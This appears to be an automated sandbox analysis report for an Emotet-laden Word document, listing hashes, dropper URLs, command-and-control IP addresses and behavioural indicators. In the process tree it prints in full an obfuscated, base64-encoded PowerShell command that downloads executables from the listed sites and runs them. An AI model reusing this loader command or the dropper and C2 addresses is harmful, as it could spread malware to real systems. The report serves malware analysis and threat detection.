emotet | e9325a711e0f6f605b85898c5b507d4320e1f1dc672c68172b06cda359b5107e

General

Target

emotet_e2_e9325a711e0f6f605b85898c5b507d4320e1f1dc672c68172b06cda359b5107e_2020-09-19__123321441289._doc.doc
Size

176KB
MD5

8a7c7754300dab0670eaf86357a5463d
SHA1

6feb3edf05a2170772cdaef20d76b7e8e07c7b81
SHA256

e9325a711e0f6f605b85898c5b507d4320e1f1dc672c68172b06cda359b5107e
SHA512

3075f82c4530f5b9681c5b4979faf04fee0f82af288556c97b3e534abdac8290937af2f6e915f49625f9c0b4f6375b565eb9ef8aacb548ea0a29068ecad51eb2

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://santyago.org/wp-content/0mcYS6/

exe.dropper

http://dandyair.com/font-awesome/rOOAL/

exe.dropper

https://www.tekadbatam.com/wp-content/AUiw/

exe.dropper

http://kellymorganscience.com/wp-content/SCsWM/

exe.dropper

https://tewoerd.eu/img/DALSKE/

exe.dropper

http://mediainmedia.com/plugin_opencart2.3-master/Atye/

exe.dropper

http://nuwagi.com/old/XLGjc/

Extracted

Family

emotet

C2

71.72.196.159:80

134.209.36.254:8080

120.138.30.150:8080

94.23.216.33:80

157.245.99.39:8080

137.59.187.107:8080

94.23.237.171:443

61.19.246.238:443

156.155.166.221:80

50.35.17.13:80

153.137.36.142:80

91.211.88.52:7080

209.141.54.221:8080

185.94.252.104:443

174.45.13.118:80

87.106.136.232:8080

62.75.141.82:80

213.196.135.145:80

188.219.31.12:80

82.80.155.43:80

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 504 3200 powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	504	3200	powershell.exe

Emotet Payload 8 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral1/memory/188-16-0x00000000001F0000-0x0000000000200000-memory.dmp	emotet
behavioral1/memory/188-16-0x00000000001F0000-0x0000000000200000-memory.dmp	emotet
behavioral1/memory/188-15-0x0000000000550000-0x0000000000562000-memory.dmp	emotet
behavioral1/memory/188-15-0x0000000000550000-0x0000000000562000-memory.dmp	emotet
behavioral1/memory/3524-19-0x0000000000590000-0x00000000005A2000-memory.dmp	emotet
behavioral1/memory/3524-19-0x0000000000590000-0x00000000005A2000-memory.dmp	emotet
behavioral1/memory/3524-20-0x00000000005B0000-0x00000000005C0000-memory.dmp	emotet
behavioral1/memory/3524-20-0x00000000005B0000-0x00000000005C0000-memory.dmp	emotet

Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

12 504 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

Dzdsyqxb.execewmdm.exe

pid process

188 Dzdsyqxb.exe
3524 cewmdm.exe
Drops file in System32 directory 1 IoCs

Processes:

Dzdsyqxb.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\dmcmnutils\cewmdm.exe Dzdsyqxb.exe

flow	pid	process
12	504	powershell.exe

pid	process
188	Dzdsyqxb.exe
3524	cewmdm.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\dmcmnutils\cewmdm.exe	Dzdsyqxb.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

904 WINWORD.EXE
904 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.execewmdm.exe

pid process

504 powershell.exe
504 powershell.exe
504 powershell.exe
3524 cewmdm.exe
3524 cewmdm.exe
3524 cewmdm.exe
3524 cewmdm.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 504 powershell.exe
Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

WINWORD.EXE

pid process

904 WINWORD.EXE
904 WINWORD.EXE
904 WINWORD.EXE
904 WINWORD.EXE
904 WINWORD.EXE
904 WINWORD.EXE
904 WINWORD.EXE
904 WINWORD.EXE
904 WINWORD.EXE

pid	process
904	WINWORD.EXE
904	WINWORD.EXE

pid	process
504	powershell.exe
504	powershell.exe
504	powershell.exe
3524	cewmdm.exe
3524	cewmdm.exe
3524	cewmdm.exe
3524	cewmdm.exe

description	pid	process
Token: SeDebugPrivilege	504	powershell.exe

pid	process
904	WINWORD.EXE
904	WINWORD.EXE
904	WINWORD.EXE
904	WINWORD.EXE
904	WINWORD.EXE
904	WINWORD.EXE
904	WINWORD.EXE
904	WINWORD.EXE
904	WINWORD.EXE

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

powershell.exeDzdsyqxb.exe

description	pid	process	target process
PID 504 wrote to memory of 188	504	powershell.exe	Dzdsyqxb.exe
PID 504 wrote to memory of 188	504	powershell.exe	Dzdsyqxb.exe
PID 504 wrote to memory of 188	504	powershell.exe	Dzdsyqxb.exe
PID 188 wrote to memory of 3524	188	Dzdsyqxb.exe	cewmdm.exe
PID 188 wrote to memory of 3524	188	Dzdsyqxb.exe	cewmdm.exe
PID 188 wrote to memory of 3524	188	Dzdsyqxb.exe	cewmdm.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_e9325a711e0f6f605b85898c5b507d4320e1f1dc672c68172b06cda359b5107e_2020-09-19__123321441289._doc.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -en JABUADEAeAB5AHkAeQB4AD0AKAAoACcASwAnACsAJwBrAHkAbQAnACkAKwAoACcAXwA0ACcAKwAnAGsAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABFAG4AVgA6AFUAUwBFAHIAUABSAE8ARgBpAEwAZQBcAHUANgB3ADcATwBfAGwAXABQAFMAagBrADMAcABOAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQBSAEUAQwB0AE8AUgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBjAFUAUgBpAGAAVABgAHkAUAByAG8AVABvAGMAYABvAEwAIgAgAD0AIAAoACgAJwB0ACcAKwAnAGwAcwAxADIAJwApACsAJwAsACAAJwArACgAJwB0ACcAKwAnAGwAcwAxADEAJwApACsAJwAsACcAKwAoACcAIAB0ACcAKwAnAGwAcwAnACkAKQA7ACQARQByAG8AcwAzAGYAYwAgAD0AIAAoACgAJwBEACcAKwAnAHoAZAAnACkAKwAoACcAcwAnACsAJwB5AHEAeABiACcAKQApADsAJABHAHIAdgBuAGYAcwAzAD0AKAAoACcARAAzAGIAcwAnACsAJwBvACcAKQArACcAbQBmACcAKQA7ACQAQQBrADEAYwBkAHcAcQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAEYAJwArACcAeAAnACsAJwAyAFUAJwArACcANgB3ADcAbwBfAGwAJwApACsAJwBGACcAKwAoACcAeAAnACsAJwAyAFAAcwBqACcAKQArACcAawAnACsAJwAzACcAKwAnAHAAJwArACgAJwBuACcAKwAnAEYAeAAnACkAKwAnADIAJwApAC0AUgBFAHAAbABhAGMARQAgACAAKAAnAEYAeAAnACsAJwAyACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACsAJABFAHIAbwBzADMAZgBjACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABZAHMAZQBtAF8AcwA0AD0AKAAoACcATgAnACsAJwBnAGMAJwApACsAJwBtADcAJwArACcAdgBrACcAKQA7ACQATgBjADIAeQAwAG8AMgA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBFAFQALgB3AGUAYgBjAGwAaQBlAG4AdAA7ACQASAA1AHQANQA1AG8AawA9ACgAJwBoAHQAJwArACcAdAAnACsAKAAnAHAAcwA6ACcAKwAnAC8ALwBzACcAKwAnAGEAJwApACsAJwBuAHQAJwArACgAJwB5AGEAJwArACcAZwAnACkAKwAoACcAbwAuAG8AcgBnACcAKwAnAC8AJwApACsAJwB3ACcAKwAoACcAcAAtAGMAbwBuACcAKwAnAHQAJwApACsAJwBlAG4AJwArACcAdAAvACcAKwAoACcAMABtACcAKwAnAGMAWQBTADYAJwApACsAKAAnAC8AJwArACcAKgBoAHQAJwApACsAKAAnAHQAcAAnACsAJwA6AC8ALwBkACcAKQArACcAYQAnACsAKAAnAG4AZAAnACsAJwB5ACcAKQArACcAYQBpACcAKwAnAHIALgAnACsAJwBjAG8AJwArACgAJwBtAC8AZgBvACcAKwAnAG4AdAAnACsAJwAtAGEAJwApACsAKAAnAHcAJwArACcAZQBzAG8AbQAnACkAKwAoACcAZQAvAHIAJwArACcATwAnACkAKwAoACcATwAnACsAJwBBACcAKwAnAEwALwAqAGgAdAB0ACcAKQArACgAJwBwAHMAOgAvACcAKwAnAC8AdwB3AHcALgAnACsAJwB0AGUAawAnACsAJwBhAGQAYgBhAHQAYQBtAC4AYwBvACcAKQArACgAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwAnACkAKwAoACcAbgB0ACcAKwAnAGUAJwApACsAJwBuACcAKwAnAHQALwAnACsAKAAnAEEAVQBpACcAKwAnAHcALwAnACkAKwAoACcAKgBoACcAKwAnAHQAdABwACcAKwAnADoALwAvAGsAJwArACcAZQAnACkAKwAoACcAbABsACcAKwAnAHkAJwApACsAJwBtACcAKwAoACcAbwByAGcAYQBuACcAKwAnAHMAYwAnACsAJwBpAGUAJwApACsAJwBuAGMAJwArACgAJwBlAC4AJwArACcAYwAnACkAKwAoACcAbwBtAC8AdwAnACsAJwBwAC0AYwAnACsAJwBvACcAKQArACgAJwBuAHQAJwArACcAZQAnACkAKwAoACcAbgAnACsAJwB0AC8AUwAnACkAKwAoACcAQwBzACcAKwAnAFcATQAvACcAKwAnACoAaAB0AHQAcAAnACkAKwAoACcAcwA6AC8AJwArACcALwB0ACcAKQArACcAZQAnACsAKAAnAHcAbwAnACsAJwBlACcAKQArACcAcgAnACsAJwBkACcAKwAnAC4AJwArACcAZQB1ACcAKwAoACcALwAnACsAJwBpAG0AZwAvAEQAQQAnACsAJwBMAFMAJwApACsAJwBLACcAKwAnAEUAJwArACgAJwAvACcAKwAnACoAaAB0AHQAcAAnACkAKwAoACcAOgAnACsAJwAvAC8AJwApACsAKAAnAG0AZQAnACsAJwBkACcAKQArACcAaQBhACcAKwAoACcAaQBuACcAKwAnAG0AZQAnACkAKwAoACcAZABpACcAKwAnAGEAJwApACsAJwAuAGMAJwArACgAJwBvAG0ALwAnACsAJwBwAGwAJwApACsAJwB1ACcAKwAoACcAZwBpAG4AXwBvAHAAJwArACcAZQBuACcAKQArACgAJwBjAGEAcgB0ACcAKwAnADIAJwApACsAKAAnAC4AMwAtACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAcwB0ACcAKwAnAGUAcgAvACcAKQArACgAJwBBAHQAeQAnACsAJwBlAC8AKgBoACcAKwAnAHQAJwApACsAJwB0ACcAKwAoACcAcAAnACsAJwA6AC8ALwAnACkAKwAoACcAbgB1AHcAYQAnACsAJwBnAGkALgBjAG8AJwArACcAbQAvAG8AbAAnACsAJwBkACcAKwAnAC8AWABMAEcAagBjAC8AJwApACkALgAiAHMAUABgAEwAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUAAxAHAAZwBiAGwAagA9ACgAKAAnAFgAaQAnACsAJwA2ACcAKQArACgAJwBiACcAKwAnAGkAaQAyACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAWABoAHoANwBuAGsAbQAgAGkAbgAgACQASAA1AHQANQA1AG8AawApAHsAdAByAHkAewAkAE4AYwAyAHkAMABvADIALgAiAGQAbwBXAE4ATABPAGAAQQBkAGYASQBgAEwAZQAiACgAJABYAGgAegA3AG4AawBtACwAIAAkAEEAawAxAGMAZAB3AHEAKQA7ACQAWQBrADEAMABzADEAXwA9ACgAKAAnAFMAJwArACcAbgA1ADAAcAAnACkAKwAnAHAAagAnACkAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAQQBrADEAYwBkAHcAcQApAC4AIgBsAGUAbgBgAEcAdABoACIAIAAtAGcAZQAgADMAMQAyADMAOQApACAAewAmACgAJwBJAG4AdgAnACsAJwBvACcAKwAnAGsAZQAtAEkAdAAnACsAJwBlAG0AJwApACgAJABBAGsAMQBjAGQAdwBxACkAOwAkAFkAOAB6ADkAMABnAHgAPQAoACgAJwBJAHEAMgAnACsAJwB5ACcAKQArACgAJwAzAF8AJwArACcAawAnACkAKQA7AGIAcgBlAGEAawA7ACQAUwBvAHYANwBsAHYANwA9ACgAJwBSACcAKwAnAHMAJwArACgAJwB6ACcAKwAnAHIAawBuAHIAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEgAdQBrAGwAYwBxAF8APQAoACgAJwBCADEAZwAnACsAJwBrACcAKQArACcAaQAnACsAJwBkADkAJwApAA==
1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:504

C:\Users\Admin\U6w7o_l\Psjk3pn\Dzdsyqxb.exe
"C:\Users\Admin\U6w7o_l\Psjk3pn\Dzdsyqxb.exe"
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:188

C:\Windows\SysWOW64\dmcmnutils\cewmdm.exe
"C:\Windows\SysWOW64\dmcmnutils\cewmdm.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3524

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\U6w7o_l\Psjk3pn\Dzdsyqxb.exe

Download Submit
C:\Users\Admin\u6w7O_l\PSjk3pN\Dzdsyqxb.exe

Download Submit
C:\Windows\SysWOW64\dmcmnutils\cewmdm.exe

Download Submit
memory/188-12-0x0000000000000000-mapping.dmp

Download
memory/188-15-0x0000000000550000-0x0000000000562000-memory.dmp

Filesize
72KB

Download
memory/188-16-0x00000000001F0000-0x0000000000200000-memory.dmp

Filesize
64KB

Download
memory/504-10-0x000001E926FF0000-0x000001E926FF1000-memory.dmp

Filesize
4KB

Download
memory/504-9-0x00007FFE375E0000-0x00007FFE37FCC000-memory.dmp

Filesize
9.9MB

Download
memory/504-11-0x000001E93F2B0000-0x000001E93F2B1000-memory.dmp

Filesize
4KB

Download
memory/904-5-0x000002165910E000-0x0000021659113000-memory.dmp

Filesize
20KB

Download
memory/904-0-0x00007FFE3F0D0000-0x00007FFE3F796000-memory.dmp

Filesize
6.8MB

Download
memory/904-8-0x000002165935F000-0x000002165937F000-memory.dmp

Filesize
128KB

Download
memory/904-6-0x0000021657168000-0x0000021657171000-memory.dmp

Filesize
36KB

Download
memory/904-7-0x000002165935F000-0x000002165937F000-memory.dmp

Filesize
128KB

Download
memory/904-3-0x0000021659105000-0x000002165910E000-memory.dmp

Filesize
36KB

Download
memory/904-4-0x0000021659105000-0x000002165910E000-memory.dmp

Filesize
36KB

Download
memory/904-1-0x0000021659105000-0x000002165910E000-memory.dmp

Filesize
36KB

Download
memory/904-2-0x0000021659105000-0x000002165910E000-memory.dmp

Filesize
36KB

Download
memory/3524-17-0x0000000000000000-mapping.dmp

Download
memory/3524-19-0x0000000000590000-0x00000000005A2000-memory.dmp

Filesize
72KB

Download
memory/3524-20-0x00000000005B0000-0x00000000005C0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads